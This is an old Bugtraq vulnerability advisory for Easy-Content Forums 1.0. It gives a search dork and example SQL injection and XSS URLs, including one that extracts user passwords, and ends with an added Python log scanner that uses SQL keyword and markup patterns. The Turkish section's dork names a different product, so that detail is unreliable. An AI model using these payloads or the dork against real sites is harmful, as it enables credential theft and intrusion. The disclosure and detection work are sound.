Message-ID: <20060523183957.25838.qmail@securityfocus.com>
Date: 23 May 2006 18:39:57 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTION--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
# ajann,Turkey
TURKISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Keyword [Search] : "powered by phpmydirectory"
# Discovered by : ajann
# Files where the vulnerability was found;
SQL INJECTION--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=YOUR SQL QUERY
### http://[target]/[path]/topics.asp?catid=1'YOUR SQL QUERY =>catid=variable
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=YOUR XSS CODE
### http://[target]/[path]/topics.asp?catid=30&forumname=YOUR XSS CODE
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E will display an alert showing X on screen.
Description:
Because of missing filtering in userview.asp and topics.asp, SQL queries can be executed.
Because of missing filtering in userview.asp and topics.asp, XSS code can run.
# ajann,Turkey
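
Added example, not part of the original post or of Easy-Content Forums: a log check a site operator could run over web server access logs to find requests that put SQL syntax or HTML markup into the parameters named above. The log format, the /forum/ path, the sample lines and the assumption that catid is a numeric id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameters named in the advisory. Assumption: catid is a numeric id.
WATCHED = {"topics.asp": ("catid", "forumname"), "userview.asp": ("startletter",)}
SQL_RE = re.compile(r"'|--|;|\b(union|select|insert|update|delete|drop)\b", re.I)
MARKUP_RE = re.compile(r'[<>"]')
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return sorted (parameter, reason) findings for one request URL."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes each value and turns '+' into a space
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = set()
    for name in WATCHED.get(script, ()):
        for value in params.get(name, []):
            if name == "catid" and not value.isdigit():
                findings.add((name, "non-numeric id"))
            if SQL_RE.search(value):
                findings.add((name, "sql syntax"))
            if MARKUP_RE.search(value):
                findings.add((name, "html markup"))
    return sorted(findings)

def scan(log_lines):
    """Map 1-based line numbers to findings for lines that trip a check."""
    hits = {}
    for number, line in enumerate(log_lines, 1):
        match = REQ_RE.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits[number] = found
    return hits

# Constructed sample log: documentation IP ranges, request strings from the advisory
SAMPLE_LOG = [
    '198.51.100.7 - - [23/May/2006:18:40:01 +0000] "GET /forum/topics.asp?catid=30&forumname=General+Chat HTTP/1.1" 200 5120',
    '203.0.113.9 - - [23/May/2006:18:41:12 +0000] "GET /forum/topics.asp?catid=1%20union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users HTTP/1.1" 200 734',
    '203.0.113.9 - - [23/May/2006:18:41:40 +0000] "GET /forum/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E HTTP/1.1" 200 5188',
    '198.51.100.7 - - [23/May/2006:18:42:03 +0000] "GET /forum/userview.asp?startletter=A HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, found)
```

The keyword list is deliberately broad, so a forum whose name contains a word such as "select" will be flagged and needs manual review.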